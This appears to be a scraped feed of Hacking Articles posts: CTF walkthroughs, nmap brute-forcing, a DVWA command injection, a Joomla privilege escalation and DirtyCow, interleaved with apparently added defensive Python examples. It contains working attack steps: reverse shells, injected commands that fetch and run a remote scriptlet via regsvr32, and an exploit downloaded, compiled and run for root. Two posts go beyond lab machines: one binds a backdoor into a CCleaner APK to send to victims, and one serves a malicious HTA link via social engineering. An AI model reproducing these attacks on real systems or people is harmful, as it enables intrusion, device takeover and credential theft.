Channel: Kali Linux Archives - Hacking Articles

Password Cracking using Nmap


In the previous practical I used basic commands to scan the victim's PC and found open ports such as FTP, SSH, Telnet, SNMP, etc. You can check it here. But now the question is: once we have found open ports, what else can we do with nmap scripts to retrieve information about the victim? Read ahead to find out.

FTP BRUTE

Crack the password using the nmap FTP brute script.

nmap -p21 --script ftp-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

From the scanning result I have successfully obtained the FTP password of the victim PC: msfadmin:msfadmin as username and password.

TELNET BRUTE

Crack the password using the nmap Telnet brute script.

nmap -p23 --script telnet-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

I have successfully obtained the Telnet password of the victim PC: msfadmin:msfadmin as username and password.

SMB BRUTE

Crack the password using the nmap SMB brute script.

nmap -p445 --script smb-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

I have successfully obtained the SMB passwords of the victim PC: msfadmin:msfadmin and user:user as username and password.

MYSQL BRUTE

Crack the password using the nmap MySQL brute script.

nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/Desktop/user.txt 192.168.1.105

Here I found two users, root and guest, with empty passwords on the MySQL server.
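The other side of the wordlist attacks shown above is what they leave in the target's logs. The following Python script is an added example, not part of the original article: it parses a handful of constructed sshd/vsftpd-style failure and success lines (the timestamp format and the exact message formats are assumptions for this example), counts failures per source address inside a sliding window, and reports a successful login from an address that was already flagged, which is the signal that a guessed password worked.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not output from the article): abbreviated syslog-style
# lines of the kind sshd and vsftpd write while a wordlist attack runs. The
# timestamp format is an assumption made for this example.
SAMPLE_LOG = """\
2017-03-01T10:15:01 sshd[2210]: Failed password for invalid user admin from 192.168.1.50 port 40112 ssh2
2017-03-01T10:15:01 sshd[2210]: Failed password for invalid user root from 192.168.1.50 port 40113 ssh2
2017-03-01T10:15:02 sshd[2211]: Failed password for msfadmin from 192.168.1.50 port 40114 ssh2
2017-03-01T10:15:02 vsftpd[2305]: [msfadmin] FAIL LOGIN: Client "192.168.1.50"
2017-03-01T10:15:03 vsftpd[2305]: [user] FAIL LOGIN: Client "192.168.1.50"
2017-03-01T10:15:03 vsftpd[2306]: [msfadmin] OK LOGIN: Client "192.168.1.50"
2017-03-01T10:15:04 sshd[2212]: Failed password for alice from 10.0.0.7 port 5123 ssh2
2017-03-01T10:20:30 sshd[2213]: Failed password for alice from 10.0.0.7 port 5124 ssh2
"""

FAILURE_PATTERNS = [
    re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"),
    re.compile(r"\[(?P<user>[^\]]+)\] FAIL LOGIN: Client \"(?P<ip>[\d.]+)\""),
]
SUCCESS_PATTERN = re.compile(r"\[(?P<user>[^\]]+)\] OK LOGIN: Client \"(?P<ip>[\d.]+)\"")


def parse_line(line):
    """Return (timestamp, ip, user, success) for an auth event, or None for other lines."""
    ts_str, _, rest = line.partition(" ")
    try:
        ts = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%S")
    except ValueError:
        return None
    m = SUCCESS_PATTERN.search(rest)
    if m:
        return ts, m["ip"], m["user"], True
    for pat in FAILURE_PATTERNS:
        m = pat.search(rest)
        if m:
            return ts, m["ip"], m["user"], False
    return None


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs that reach `threshold` failures inside a sliding `window`.

    Returns (flagged, compromised): flagged maps ip -> time the threshold was
    crossed; compromised holds (ip, user) pairs that logged in successfully
    after that ip was flagged, i.e. a password the wordlist most likely hit.
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    flagged = {}
    compromised = set()
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        ts, ip, user, success = event
        if success:
            if ip in flagged:
                compromised.add((ip, user))
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged, compromised


if __name__ == "__main__":
    flagged, compromised = detect_bruteforce(SAMPLE_LOG)
    for ip, when in flagged.items():
        print(f"brute force from {ip} detected at {when}")
    for ip, user in sorted(compromised):
        print(f"successful login for {user} from flagged source {ip}")
```

On the sample, 192.168.1.50 crosses the five-failure threshold within two seconds and its later OK LOGIN as msfadmin is reported; the two failures from 10.0.0.7 are five minutes apart and never trip the detector. Real deployments would feed this from the service logs directly and tune the threshold and window per service.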

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets lover.

The post Password Cracking using Nmap appeared first on Hacking Articles.


Hack the SickOS 1.1 VM (CTF Challenge)


This time we are going to crack SickOS 1.1 from the Boot2root challenges. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment. The objective is to compromise the network/machine and gain administrative/root privileges on it.

WalkThrough

We will start off by finding the target.

netdiscover

Our target IP is 192.168.0.101. Now we scan the IP with nmap.

nmap -p- -A 192.168.0.101

The ports we found open are 22, 3128 and 8080. Here, if you try to open the VM's IP in the browser, nothing will load. So now we will use nikto.

nikto -h 192.168.0.101:3128

Nikto helps us find a text file called robots.txt. Let's open it in the browser.

This tells us something about /wolfcms, which means the website is built with Wolf CMS and/or there is a directory named /wolfcms. We tried to open it in the browser but failed. If you observed the nmap output, there was something about a proxy on port 3128. So we will set up a manual proxy in the browser: give the IP of the VM as the HTTP proxy and 3128 as the port.

After the proxy has been set up, open the site in the browser at: 192.168.0.101/wolfcms/

The page opens as above, indicating that it was built with Wolf CMS. I don't know much about Wolf CMS, so I searched Google to find where the admin page resides.

I found the login page through Google and opened it. It asked me for a username and password. By default the username and password are admin and admin respectively.

I used the default username and password and logged in to the page shown below. Here, select the Files tab and then the Upload files option.

Here, we need to upload the malicious file. To generate it, open your terminal in Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

Copy the code from <?php to die(); and paste it into a text file with the .php extension. Upload that file.

Now, before running the file, start multi/handler in Metasploit by typing:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 4444

exploit

As you hit enter, run the uploaded file too and you will have your session. Once you have it, go to the shell and type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

After doing the above, you will be logged in as a user of our target. To see what files and directories are there, type:

ls

Then read config.php by typing:

cat config.php

Reading the config.php file will give you all the details about the database, including the username and password, i.e. root and john@123 respectively.

Moving further, read the password file; to do so type:

cat /etc/passwd

Observe all the user details it gives us; you will find that user sickos has the value 1000:1000, which means this is the first user. So we might find our way in here, as it is the first user. Therefore, switch user to sickos with the password john@123 that we found.

su sickos

Then type the following command to see the IDs:

id

Now we need root access; for that type:

sudo -s

And give the password john@123 again. To confirm that you are now root, type:

whoami

Furthermore, we need to go into /root to look for the flag, so run the following set of commands:

cd /root

ls

Here you will find a text file. Let's read it.

cat a0216ea4d51874464078c618298b1367.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

Hack any Android Phone using Spade APK Backdoor


In this article we will learn yet another method to hack Android. This is the most natural way of hacking an Android user, as you are binding your malicious file with the original one, just like we did earlier with an APK.

Firstly, we will download CCleaner from www.apk4fun.com, as we will bind our payload file with it.

Our next step is downloading the software, Spade. To download it, go to the terminal in your Kali and type:

git clone https://github.com/suraj-root/spade.git

Running the above command installs the software. Next, type:

./spade.py /root/Desktop/ccleaner.apk

When you run the above command it will ask you for the payload, lhost and lport. For the payload select option 3, i.e. type 3. Then give the lhost and lport:

Lhost > 192.168.0.104

Lport > 4444

The above commands bind the original file with our malicious one.

After it has all been done successfully, it will ask us to set up the listener. Type 'y' here; a new APK will now be saved in the spade folder.

Now you can send the victim the link so that they can download it.

When the victim clicks Install, the application will be installed along with our malicious file.

And when the application is opened, you will have the victim's session.

As you remember, you typed 'y' before to create the listener, and the listener is created automatically with all the details you gave previously. Then, to get the session, type:

sessions -i 1

Hack the VulOS 1.1 VM (CTF Challenge)


“Your assignment is to pentest a company website, get root of the system and read the final flag” is the only thing we know about this VM, other than that it is a smaller one. Therefore, without any further ado, let's start by finding our target, aka the victim.

netdiscover

And now we will run nmap to determine what services are running.

So the services running are SSH on port 22, HTTP on port 80 and IRC on port 6667.

As port 80 is open, we can open it in the browser.

There is a link on this webpage. Let's open it; it leads to the following page.

This webpage has various tabs. I explored each tab, including its page source, and found nothing except in the last tab, i.e. Document. When you look into its page source there is a line saying “jabd0cs/ on the server. Just log in with guest/guest.”

So I opened the directory and logged in with guest:guest as username:password. There was an upload option, but with the restriction that you can only upload .doc files, so it was pretty useless.

If you observe the login page, there is a CMS: OpenDocMan v1.2.7. This version of OpenDocMan is vulnerable.

Let's search Metasploit for exploits to use against OpenDocMan. For that type:

searchsploit OpenDocMan 1.2.7

Above are the exploit's details. Now we will use sqlmap to find the database of usernames and passwords; for that type:

sqlmap -u 'http://192.168.0.102/jaabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --dbs

The sqlmap command will show us all the tables in the database, including the usernames and passwords, as shown below.

As you can see, the password is an MD5 hash. We can crack it online; no third-party tool is needed. Simply go to www.md5decrypt.org
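Why an online lookup recovers this password is worth seeing in code. The following Python is an added example, not part of the original article: with unsalted MD5, the same password always produces the same digest, so a precomputed table built from a wordlist (a constructed four-word list here) answers the query instantly; with salted, iterated PBKDF2-HMAC-SHA256 (the mitigation shown alongside), two users with the same password get different stored values and each guess costs a deliberately slow computation. The wordlist and user are constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed wordlist for the example (not from the article).
WORDLIST = ["password", "letmein", "webmin1980", "admin123"]


def md5_hex(password):
    """Unsalted MD5 as stored by the vulnerable application."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup_unsalted_md5(digest, wordlist=WORDLIST):
    """Reverse an unsalted MD5 by table lookup.

    Because there is no salt, one table built once from a wordlist serves every
    site and every user; this is what the online services do at scale.
    """
    table = {md5_hex(word): word for word in wordlist}
    return table.get(digest)


def hash_password(password, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256 in a self-describing storage format.

    A fresh 16-byte random salt per user defeats precomputed tables, and the
    iteration count makes each guess cost ~200k hash computations.
    """
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt/iterations and compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    weak = md5_hex("webmin1980")
    print("md5:", weak, "->", lookup_unsalted_md5(weak))
    strong = hash_password("webmin1980")
    print("pbkdf2:", strong)
    print("verify correct:", verify_password("webmin1980", strong))
    print("verify wrong:", verify_password("webmin1981", strong))
```

The lookup succeeds only because the digest is unsalted and the password is in the list; the PBKDF2 value changes on every call because of the random salt, yet still verifies, which is the property a password store needs.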

The password turns out to be webmin1980 with the username webmin. As we have a username and password, we can log in through SSH. To do so, open a new terminal in Kali and type:

ssh webmin@192.168.0.102

Then give the password when asked and you will have a session. Let's check the version to see whether it is vulnerable or not.

lsb_release -a

The version is 14.04, which means it can be exploited; we only need to download the exploit from www.exploit-db.com

Type the following command to download it:

wget https://www.exploit-db.com/download/37292

Once the exploit is downloaded, as always we need to rename it, compile it and run it. The set of commands for that is:

mv 37292 shell.c

gcc -o shell shell.c

./shell

And voila, you have reached root, but our challenge is not completed here. We still have to find the flag. Once you have root, go into the /root directory:

cd /root

Let's check what files and folders it holds.

ls

And here you will find flag.txt. Read it!

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

Hack the SpyderSec VM (CTF Challenge)


You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.

Level: Intermediate

You can download it from: https://www.vulnhub.com/entry/spydersec-challenge,128/#

Walkthrough

Let’s locate our target first.

netdiscover

Our target is 192.168.0.103. Now let's fire up nmap to learn its services.

nmap -A -p- 192.168.0.103

There are only two ports open, i.e. 22 and 80, for SSH and HTTP respectively. Next, I opened this page in the browser.

There was nothing major on the page except two images. There is a possibility of metadata behind these images, so I read them with exiftool. One of the images, saved under the name “Challenge”, had a comment in it. To read it type:

exiftool Challenge.png

If you observe closely, the comment is in hexadecimal. We need to convert it into readable form. No third-party tool is required: just go to string-functions.com, copy the string, paste it into the text box and click the convert button.

After converting we again have a hexadecimal string. No problem; let's convert it again as we did earlier.

This time we have a base64 string. We decode it into plain text using HackBar: paste the string and select the Base64 decode option from the Encoding drop-down menu.

Now we finally have a readable string. This could be a password or a directory; note it down for future use. Moving on, if you go through the source code of the page you will see that the eval function there is quite unusual.
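The hex, hex, base64 chain above is peeled by hand with web tools; the same job can be automated. The following Python is an added example, not code from the original article: it builds a constructed three-layer string in the same order the challenge used (base64 innermost, then hex twice), then repeatedly detects whether the current text looks like hex or base64, decodes one layer, and stops as soon as the result is readable text that matches neither encoding. The plaintext is constructed for the example.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable)
BASE64_CHARS = set(string.ascii_letters + string.digits + "+/=")

# Constructed plaintext (not the challenge's string); encoded in the same order
# the walkthrough describes: base64 first, then hex, then hex again.
PLAINTEXT = "the password is: s3cr3t-tr4il"
ENCODED = binascii.hexlify(
    binascii.hexlify(base64.b64encode(PLAINTEXT.encode()))
).decode()


def looks_like_hex(s):
    return len(s) >= 2 and len(s) % 2 == 0 and all(c in string.hexdigits for c in s)


def looks_like_base64(s):
    return len(s) >= 4 and len(s) % 4 == 0 and all(c in BASE64_CHARS for c in s)


def peel_layers(data, max_layers=10):
    """Strip nested hex/base64 encodings until the text no longer looks encoded.

    Returns (final_text, layers) where layers lists the encodings removed, in
    order. Hex is tested first because a hex string is also valid base64 text;
    a layer is only accepted if decoding yields printable ASCII, so a readable
    word that happens to be all hex digits (e.g. "abcd") is left alone.
    """
    layers = []
    text = data.strip()
    for _ in range(max_layers):
        if looks_like_hex(text):
            raw, name = bytes.fromhex(text), "hex"
        elif looks_like_base64(text):
            try:
                raw, name = base64.b64decode(text, validate=True), "base64"
            except binascii.Error:
                break
        else:
            break
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            break
        if not all(c in PRINTABLE for c in decoded):
            break
        text = decoded.strip()
        layers.append(name)
    return text, layers


if __name__ == "__main__":
    final, layers = peel_layers(ENCODED)
    print("layers removed:", " -> ".join(layers))
    print("result:", final)
```

On the constructed input the function removes hex, hex and base64 in that order and returns the plaintext; a string that already reads as text comes back unchanged with no layers removed.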

I searched about the eval function on Google and found that it is JavaScript. There can be code hidden behind it, so let's unpack it with a JavaScript unpacker.

After unpacking you will again come face to face with a hexadecimal string. Convert this string just like before.

After conversion the string became “alert(‘mulder.fbi’);”. I explored a lot but found nothing about it, so I decided to capture the site's cookies with Burp Suite. To use Burp Suite we have to turn on the manual proxy, turn on interception in Burp Suite and then simply refresh the page; without much hard work the cookies will be captured.

In the cookies I found a URI, which means it is part of a link. Go to the Params tab to see the proper link.

From here copy the link and open it in the browser.

When I opened it there was an error. Then I explored a bit and remembered that there was a mulder.fbi, so I added that to the link.

After adding mulder.fbi to the link, it asked me to download a file. Save it.

When you open the file you just saved, it plays a video with different quotes. I was clueless about this, so I started searching on Google and found out that it was a TrueCrypt file. So to see what is hidden, type:

python tcsteg2.py mulder.fbi

There was a whole drive hidden behind it. Using VeraCrypt you can mount and open the drive.

When you open it, it will ask for a password, and we found the password beforehand. So give that password.

Hence the drive will be unlocked. Now open the drive and you will find the flag there.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

Hack Remote Windows 10 PC using HTA Web Server


This module hosts an HTML Application (HTA) that, when opened, will run a payload via PowerShell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed.

Exploit Targets

Windows All Versions

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open a Kali terminal and type msfconsole

Now type use exploit/windows/misc/hta_server

msf exploit(hta_server) > set lhost 192.168.0.104

msf exploit(hta_server) > set srvhost 192.168.0.104

msf exploit(hta_server) > set payload windows/meterpreter/reverse_tcp

msf exploit(hta_server) > set lport 8443

msf exploit(hta_server) > exploit

Send the link of the server to the victim via chat, email or any social engineering technique.

When the victim's machine browses to your link, it will download the anything.hta file; when the victim clicks on it you will get the meterpreter session.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions and their numbers, then type “sessions -i ID” to connect to one.

Search Port Names and Numbers using whatportis


Whatportis is a utility command to search port numbers and/or names. It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port.

Many a time, while running an nmap command, we encounter ports whose information is missing or that we could not recognize. At that time, whatportis is helpful.

To run the command we first need to download the utility from GitHub. To install whatportis, we type the following command:

pip install whatportis

If the utility's dependencies are already installed on your PC, it will take less time to install; otherwise the installation time will depend on your connection speed.

Once the utility is installed, we can run the command ‘whatportis’.

For example, I want to check which port names exist for port number 80, so I type:

whatportis 80

As we can see, all the port names associated with port 80 are displayed on the screen.

Another example could be:

whatportis 3389

And whatportis shows 3389 successfully, which is the Microsoft WBT Server port.

Yet another example is:

whatportis 445

Here 445 is the Microsoft-DS port. We can confirm the result on the internet or by consulting any good book.
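whatportis answers from a bundled copy of the port registry; the classic local equivalent is the /etc/services file, and the following Python is an added example (not the whatportis code) that parses a constructed excerpt in that file's format and answers the same two questions, by number or by name fragment. The excerpt below is constructed for the example and is not the tool's output.

```python
import re

# Constructed excerpt in /etc/services format (not the article's output and not
# the full IANA table that whatportis ships with).
SERVICES_TEXT = """\
# Network services, Internet style
ftp             21/tcp
ssh             22/tcp                          # SSH Remote Login Protocol
telnet          23/tcp
http            80/tcp          www             # WorldWideWeb HTTP
http            80/udp
microsoft-ds    445/tcp
microsoft-ds    445/udp
mysql           3306/tcp
ms-wbt-server   3389/tcp                        # MS WBT Server
"""

# name  port/proto  [aliases...]  [# comment]
LINE_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<port>\d+)/(?P<proto>\w+)(?P<rest>[^#]*)(?:#\s*(?P<comment>.*))?$"
)


def parse_services(text):
    """Parse /etc/services-style text into a list of entry dicts."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank line or full-line comment
        m = LINE_RE.match(line)
        if not m:
            continue                      # tolerate malformed lines
        entries.append({
            "name": m["name"],
            "port": int(m["port"]),
            "proto": m["proto"],
            "aliases": m["rest"].split(),
            "comment": (m["comment"] or "").strip(),
        })
    return entries


ENTRIES = parse_services(SERVICES_TEXT)


def whatport(query, entries=ENTRIES):
    """Look up by port number, or by substring of a service name or alias."""
    if query.isdigit():
        port = int(query)
        return [e for e in entries if e["port"] == port]
    q = query.lower()
    return [e for e in entries
            if q in e["name"].lower() or any(q in a.lower() for a in e["aliases"])]


if __name__ == "__main__":
    for query in ("80", "3389", "445", "wbt"):
        for e in whatport(query):
            print(f"{query:>5}: {e['name']} {e['port']}/{e['proto']} "
                  f"{' '.join(e['aliases'])} {e['comment']}".rstrip())
```

Querying "80" returns both the tcp and udp entries (with the www alias on the tcp one), "3389" maps to ms-wbt-server with its comment, and a name fragment such as "wbt" resolves back to 3389.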

Author: Harshit Rajpal is an InfoSec researcher and has a keen interest in technology. Contact here

Command Injection Exploitation in DVWA using Metasploit (Bypass All Security)


Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

First install DVWA on your PC; for the full article read here.

Now open DVWA on your PC and log in with the following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set the website security level to Low.

Use “&&” in the command injection to bypass the low security level of this server.

Go to the Command Execution page, enter an IP address and click Submit.

Now you can see the reply telling us that we have established a connection with the server. I have tried this numerous times just to be sure, and so can you; whenever you execute this command you will see the following:

We can also run multiple commands simultaneously just by using the && sign. For example, the next command is:

192.168.1.100 && dir

After entering the above command, click Submit; the command will list all directories and files.

We have found 4 directories and a file, and also the path of the directory.

The next command is 192.168.1.100 && net user; click Submit and this command will show the list of users.

Various commands are available which, when submitted, give the intended outcome. So first we will find a way to transfer our malicious payload to the remote machine, and for that I am using my favourite tool, Metasploit. To use Metasploit, all you have to do is type msfconsole in a Kali terminal and then type the following commands:

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106

msf exploit(regsvr32_applocker_bypass_server) > set lport 4444

msf exploit(regsvr32_applocker_bypass_server) > exploit

We can use the following command to open a port on the remote host and connect back to it with Metasploit.

192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click on Submit

Now you will get a meterpreter session on the victim's PC. Type sysinfo to get system information.

Bypass Medium Level Security

Click on DVWA Security and set the website security level to Medium.

Use the pipe “|” in the command injection to bypass the medium security level of this server.

Follow the same process as above using Metasploit and then type:

192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click on Submit

Again we got meterpreter session 2.

Bypass High Level Security

Click on DVWA Security and set the website security level to High.

Try using the double pipe “||” in the command injection to bypass the high security level of this server.

Follow the same process as above using Metasploit:

192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click on Submit

Yes, we have got meterpreter session 3!!

Finally, we have completed all three levels, low, medium and high, in DVWA.
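The three levels above all fall to the same root cause named in the OWASP definition at the top: user input reaches a shell as part of a command string, and a blacklist of a few operators only moves the attacker to the next operator. The following Python is an added example, not DVWA's code and not from the article: it shows the vulnerable string-building pattern, a medium-style blacklist that strips "&&" and ";" but not "|", and the hardened form, which accepts only input that parses as an IP address and then runs ping as an argument vector with no shell at all. The function names and the two-entry blacklist are assumptions for the example.

```python
import ipaddress
import subprocess


def build_ping_command_unsafe(target):
    """The vulnerable pattern: user input spliced into a string meant for a shell.

    Returned rather than executed so the injected tail stays visible.
    """
    return "ping -c 2 " + target


def sanitize_blacklist(target, banned=("&&", ";")):
    """A filter in the spirit of DVWA's medium level: strip a few operators.

    "|" and "||" are not on the list, which is exactly why the walkthrough
    switches to them; a blacklist can only ever be as complete as its author.
    """
    for token in banned:
        target = target.replace(token, "")
    return target


def is_valid_target(target):
    """Allowlist check: accept only text that parses as an IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(target.strip())
        return True
    except ValueError:
        return False


def ping_argv_safe(target):
    """Hardened form: allowlist-validate, then build an argument vector.

    Because the command never goes through a shell, characters such as
    & | ; ` $ in the input can only ever be data, never operators.
    """
    if not is_valid_target(target):
        raise ValueError(f"not an IP address: {target!r}")
    return ["ping", "-c", "2", str(ipaddress.ip_address(target.strip()))]


def run_ping_safe(target):
    """Execute the allowlisted command without a shell (needs ping on PATH)."""
    return subprocess.run(ping_argv_safe(target), capture_output=True,
                          text=True, check=False)


if __name__ == "__main__":
    for payload in ("192.168.1.100", "192.168.1.100 && dir", "192.168.1.100 | dir"):
        print("unsafe string :", build_ping_command_unsafe(payload))
        print("after blacklist:", sanitize_blacklist(payload))
        print("allowlist ok?  :", is_valid_target(payload))
        print()
```

The first payload passes the allowlist and becomes a four-element argv; the second survives the blacklist with its operator removed but its "dir" still present; the third passes the blacklist untouched, and both injected forms are rejected outright by the allowlist.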

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets lover. Contact here


Exploiting Joomla Website using Account Creation and Privilege Escalation


In this article we will learn about hacking the Joomla CMS. To do so we will use a built-in Metasploit module, which helps us create an account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).

Exploit Targets

Joomla 3.4.4 through 3.6.3

Requirement

Attacker: kali Linux

Victim PC: Joomla 3.4.4

Open terminal in Kali and type msfconsole to start metasploit.

Once metasploit is opened then type the following commands to execute the attack:

use auxiliary/admin/http/joomla_registration_privsec

msf exploit(joomla_registration_privsec) > set rhost 192.168.0.103

msf exploit(joomla_registration_privsec) > set username raj

msf exploit(joomla_registration_privsec) > set password raj123

msf exploit(joomla_registration_privsec) > set email raj@hackingarticles.in

msf exploit(joomla_registration_privsec) > set targeturi /joomla

msf exploit(joomla_registration_privsec) > exploit

Performing this attack allows you to create a username and password of your choice; in this case I have given username raj and password raj123, along with the email ID raj@hackingarticles.in

In the image below you can see that a new user is created with the username and password you provided.

Now that you have created a user, you can log in with that username.

Thus you can hack the Joomla CMS in the simplest of ways.

Hack Linux Kernel using Dirtycow Exploit (Privilege Escalation)


People say that “good things take time”, but everyone knows that in today's world everyone has everything but time, especially in cyber security and hacking. But worry no more about time, as we are going to present the best and most time-saving method to hack any Linux server/machine through DirtyCow. This is the latest vulnerability to be found; it works against every version of the kernel that has existed till date, and researchers and attackers are taking it very seriously. It's a nine-year-old bug, but it has only been discovered now. And it has already begun to be used as leverage against the digital world.

DirtyCow is the latest exploit coined against every version of the Linux kernel. It got the name “Cow” because it works on Copy-on-Write breakage. The kernel's memory system handles Copy-On-Write breakage, which involves private read-only mappings. So basically this exploit helps us escalate privileges by modifying existing setuid files.

Now I am going to walk you through the practical of DirtyCow by creating a normal user in my Kali, and then I will guide you through the whole practical, so stay with me. The vulnerability was discovered by security researcher Phil Oester. Link here.

First, make a new user in your Kali by typing:

useradd -m raj

passwd raj

After running the above two commands it will ask you for a password; give any password and repeat it.

Once your password is updated successfully and the user is created, log in to Kali as that new user and then go to this link: https://github.com/gbonacini/CVE-2016-5195 and download the zip file.

After the download is done, open the zip file. You will find a folder; open that folder in the terminal. In the terminal you will notice that you do not have administrative privileges; to confirm this just type:

id

After this let's check the list of files in the folder; for that type:

ls

Further, type:

make

And then run the dcow file by typing:

./dcow

Executing the above command will show you the password. Copy this password and then type:

su

Then give the same password that you copied when asked.

And VOILA!!! You have the access to the root!!

Conclusion: Using this we are modifying the Copy-On-Write cache in the kernel. By modifying it we are changing the contents of any readable and mappable file. It can alter any file, but the changes affect the cache memory only, which means that after a reboot the changes revert to normal. Hence it lets us get root access.

Hack the Kioptrix VM (CTF Challenge)


Today we are going to solve Kioptrix: Level 1.3 (#4). It is a Boot2Root series provided for practice. The hints we have from the author are:

  • It’s possible to remotely compromise the machine
  • Stays within the target audience of this site
  • Must be “realistic” (well kinda…)
  • Should serve as a refresher for me. Be it PHP or MySQL usage etc.

So basically its security level is from beginner to intermediate. Let's try to break through it. But before that, please note that you can download it from: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

WalkThrough

As always start off by finding the target.

netdiscover

And so our target is 192.168.0.101. We will now scan it with nmap.

nmap -p- -A 192.168.0.101

From the nmap results you can see that the HTTP service is running on two ports, i.e. 80 and 8080, along with SSH on port 22. As we have an HTTP service running, we should try to open it in our browser.

There is nothing on the webpage except that it says “It works!”; let's have a look at its source code.

In its source code there is a URL mentioned, i.e. pChart2.1.3/index.php. Open this URL.

And so the URL opens and takes us to a PHP library. pChart is basically a PHP library that helps create or manage anti-aliased charts or pictures directly from the web server. I searched Google to learn more about it and stumbled upon some useful information, i.e. that this version of pChart was vulnerable. Therefore, I searched for its exploit on exploit-db.com.

And so I found an appropriate exploit. When you explore the exploit there is a link given:

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

I opened this link, except that I used the VM's IP, and found the following page:
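The Script parameter in the link above is a directory traversal: the decoded value starts with "/../../", and the viewer joins it to its examples directory without checking where the result lands. The following Python is an added example, not pChart's code and not from the article: it reproduces the unchecked join, then the fix, which decodes, joins, normalises and requires the resolved path to remain inside the base directory. The base directory path and script names are constructed for the example.

```python
import os
from urllib.parse import unquote

# Constructed base directory for the example (not the VM's real layout).
EXAMPLES_DIR = "/var/www/examples"


def resolve_script_unsafe(base, script):
    """The pattern behind the traversal: decode the parameter and join it to the
    base directory with no containment check. A leading "/" or "../" segments
    walk straight out of `base`."""
    return os.path.normpath(os.path.join(base, unquote(script)))


def resolve_script_safe(base, script):
    """Decode, join, normalise, then require the result to stay inside `base`.

    Returns the resolved path, or None when the request escapes the directory.
    commonpath is used instead of startswith so that "/var/www/examples2/x"
    is not mistaken for something under "/var/www/examples". If the tree may
    contain symlinks, apply os.path.realpath to both paths before comparing.
    """
    base = os.path.normpath(base)
    candidate = os.path.normpath(os.path.join(base, unquote(script)))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for script in ("line.php", "charts%2fpie.php", "%2f..%2f..%2fetc/passwd",
                   "..%2f..%2fetc/passwd", "../examples2/x.php"):
        print(f"{script!r:32} unsafe -> {resolve_script_unsafe(EXAMPLES_DIR, script)}")
        print(f"{'':32} safe   -> {resolve_script_safe(EXAMPLES_DIR, script)}")
```

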